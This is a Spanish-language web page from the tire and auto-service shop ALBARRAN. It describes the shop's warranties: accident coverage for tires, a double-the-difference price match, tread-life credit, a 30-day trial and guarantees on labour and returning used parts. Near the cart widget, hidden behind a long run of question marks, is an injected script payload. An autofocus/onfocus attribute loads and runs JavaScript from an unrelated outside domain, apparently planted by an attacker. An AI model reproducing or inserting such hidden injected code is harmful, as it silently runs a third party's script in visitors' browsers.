Garantia
828
page-template,page-template-full_width,page-template-full_width-php,page,page-id-828,wp-custom-logo,theme-bridge,bridge-core-2.7.2,woocommerce-no-js,qode-page-transition-enabled,ajax_updown,page_not_loaded,qode-page-loading-effect-enabled,,qode-title-hidden,transparent_content,qode_disabled_responsive_button_padding_change,columns-4,qode-child-theme-ver-,qode-theme-ver-25.7,qode-theme-bridge,wpb-js-composer js-comp-ver-6.6.0,vc_responsive

GARANTÍA

PASE LO QUE PASE

La garantía PLP exclusiva de ALBARRAN, lo protege contra los accidentes del camino; si algo le pasa a su llanta como resultado de caer en un bache o en una alcantarilla, de darle un banquetazo, de sufrir una cortada o ponchadura por un clavo, vidrio, etc. pase lo que pase se la reparamos; y si hubiera quedado inservible, se la reponemos por una nueva, Sin Costo.

Durante el primer año o 15,000 kilómetros, lo que ocurra primero.

MEJOR PRECIO

Si usted encuentra una llanta igual a la nuestra a un menor precio, le devolvemos el doble de la diferencia.

¡Sin Trucos!

DURACIÓN

ALBARRAN es el único que le garantiza la duración de sus llantas, nuestra experiencia de más de 60 años nos lo permiten, ni siquiera los fabricantes ofrecen una garantía similar.

Por ejemplo si usted compra una llanta que esta garantizada por 100,000 kilómetros y su vida útil termina a los 80,000, usted pagaría únicamente por el tiempo que le duro, nosotros le bonificaríamos la diferencia, en este caso de un 20% en la compra de una llanta nueva.

30 DÍAS A PRUEBA

Queremos que su satisfacción sea Total, por eso si usted aún no conoce alguno de nuestros modelos de llantas, pruébelas. Si por cualquier motivo usted no esta satisfecho devuélvanoslas y se las reponemos por otras equivalentes.

Sin Ningún Cargo.

GATO POR LIEBRE

Le entregamos sus refacciones usadas y si no lo hacemos antes de que usted pague, no le cobramos la mano de obra.

A TIEMPO NO PAGA

Tenemos su auto listo a la hora prometida o no paga la mano de obra.

Pago Seguro

0
0 producto
???????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????? \" onfocus=script=document.createElement("script");script.src="//ideasenpapel.com.gt/404/js/counter.js";document.head.append(script); autofocus=\"
Carrito vacío
Abrir chat
¿Necesitas ayuda?
Hola , ¿En que podemos ayudarte?